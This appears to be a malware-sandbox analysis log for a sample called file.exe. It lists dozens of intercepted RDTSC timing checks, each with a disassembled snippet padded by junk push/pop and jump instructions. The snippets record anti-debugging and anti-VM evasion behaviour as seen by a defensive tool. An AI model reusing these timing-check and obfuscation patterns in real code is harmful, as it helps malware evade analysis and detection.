                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F079 second address: C9F081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F224 second address: C9F22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F22A second address: C9F232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6654 second address: CA6659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6659 second address: CA6661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4840 second address: CA485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769E7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA485C second address: CA4866 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC41D10CDDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4866 second address: CA486E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA49D4 second address: CA49E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA49E0 second address: CA4A03 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41C7769D6h 0x00000008 jmp 00007FC41C7769E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007FC41C7769D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4CAA second address: CA4CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC41D10CDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC41D10CDDAh 0x00000012 jg 00007FC41D10CDD6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4CC7 second address: CA4CD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC41C7769D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA528A second address: CA52AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jno 00007FC41D10CDDCh 0x0000000b push ebx 0x0000000c jmp 00007FC41D10CDDDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5826 second address: CA582C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA582C second address: CA5855 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41D10CDD8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FC41D10CDE8h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5855 second address: CA585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA585B second address: CA5866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5866 second address: CA587E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41C7769E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA587E second address: CA588D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41D10CDDBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA588D second address: CA5896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA637C second address: CA6386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAF2F second address: CAAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAF33 second address: CAAF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA0C8 second address: CAA0F1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC41C7769D6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC41C7769DDh 0x00000014 pop esi 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007FC41C7769D6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA0F1 second address: CAA0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA0F5 second address: CAA119 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41C7769D6h 0x00000008 jp 00007FC41C7769D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007FC41C7769DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FC41C7769D6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3BB second address: CAA3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FC41D10CDD6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FC41D10CDDDh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3E9 second address: CAA408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769E1h 0x00000007 jc 00007FC41C7769D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA408 second address: CAA40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA91B second address: CAA956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC41C7769DEh 0x0000000e jmp 00007FC41C7769E7h 0x00000013 ja 00007FC41C7769D6h 0x00000019 popad 0x0000001a pop ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA956 second address: CAA95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA95C second address: CAA966 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41C7769D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA966 second address: CAA970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA970 second address: CAA980 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC41C7769D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA980 second address: CAA984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAACC second address: CAAADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769DFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAADF second address: CAAAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAAF5 second address: CAAAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAAFB second address: CAAB10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FC41D10CDF6h 0x0000000d ja 00007FC41D10CDDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAB10 second address: CAAB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAB18 second address: CAAB22 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D10CDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAC71 second address: CAAC8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769DCh 0x00000007 jp 00007FC41C7769D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC41C7769D8h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8440 second address: CB8444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6649 second address: CB664D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB664D second address: CB6655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6655 second address: CB665C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6C1D second address: CB6C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7128 second address: CB7130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7470 second address: CB7474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7474 second address: CB7480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC41C7769D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7480 second address: CB7489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B72 second address: CB7B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B76 second address: CB7B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B7C second address: CB7B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC41C7769D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB61E3 second address: CB61F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC41D10CDDCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB61F5 second address: CB6209 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41C7769DCh 0x00000008 js 00007FC41C7769D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD6C7 second address: CBD6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC41D10CDDFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD6DF second address: CBD6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD96B second address: CBD977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC41D10CDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD977 second address: CBD97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD97C second address: CBD98A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC41D10CDD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBD98A second address: CBD98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF2AD second address: CBF2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF2B1 second address: CBF2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FC41C7769D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9FE5 second address: CC9FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC41D10CDD6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9FF2 second address: CCA010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC41C7769E7h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA010 second address: CCA01E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA01E second address: CCA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA02B second address: CCA07A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FC41D10CDE7h 0x00000016 popad 0x00000017 jmp 00007FC41D10CDDFh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC41D10CDDFh 0x00000023 jns 00007FC41D10CDD6h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDAD3 second address: CCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC41C7769E2h 0x0000000b jne 00007FC41C7769D6h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDAF2 second address: CCDAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC41D10CDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDAFD second address: CCDB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD567 second address: CCD571 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD571 second address: CCD57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC41C7769D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD57B second address: CCD5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC41D10CDDCh 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC41D10CDDFh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD708 second address: CCD74F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41C7769DAh 0x00000008 jp 00007FC41C7769D8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jnl 00007FC41C7769D6h 0x0000001a pushad 0x0000001b popad 0x0000001c jnp 00007FC41C7769D6h 0x00000022 popad 0x00000023 jmp 00007FC41C7769E6h 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007FC41C7769D6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD74F second address: CCD753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDE86 second address: CDDE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769E4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDE9E second address: CDDEB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41D10CDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FC41D10CDD8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDEB0 second address: CDDEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDD3E second address: CDDD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDD42 second address: CDDD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1BEA second address: CE1BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1AAD second address: CE1AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5CA1 second address: CE5CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5CAB second address: CE5CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1049h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5CCD second address: CE5D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FC41D25BAD3h 0x0000000b jmp 00007FC41D25BAD7h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC41D25BAD8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5FD8 second address: CE5FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5FDE second address: CE5FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5FE2 second address: CE604D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC41CBA1036h 0x00000008 jns 00007FC41CBA1036h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FC41CBA1041h 0x00000016 jng 00007FC41CBA1036h 0x0000001c jmp 00007FC41CBA1045h 0x00000021 popad 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 jg 00007FC41CBA1036h 0x0000002e pop ecx 0x0000002f pushad 0x00000030 jng 00007FC41CBA1036h 0x00000036 jmp 00007FC41CBA1047h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE604D second address: CE605E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BACCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE605E second address: CE6077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CBA103Fh 0x00000009 jg 00007FC41CBA1036h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6077 second address: CE607B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE64A1 second address: CE64A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE64A5 second address: CE6514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D25BACBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FC41D25BACCh 0x00000025 jnp 00007FC41D25BAC6h 0x0000002b jmp 00007FC41D25BAD1h 0x00000030 popad 0x00000031 jmp 00007FC41D25BAD8h 0x00000036 rdtsc
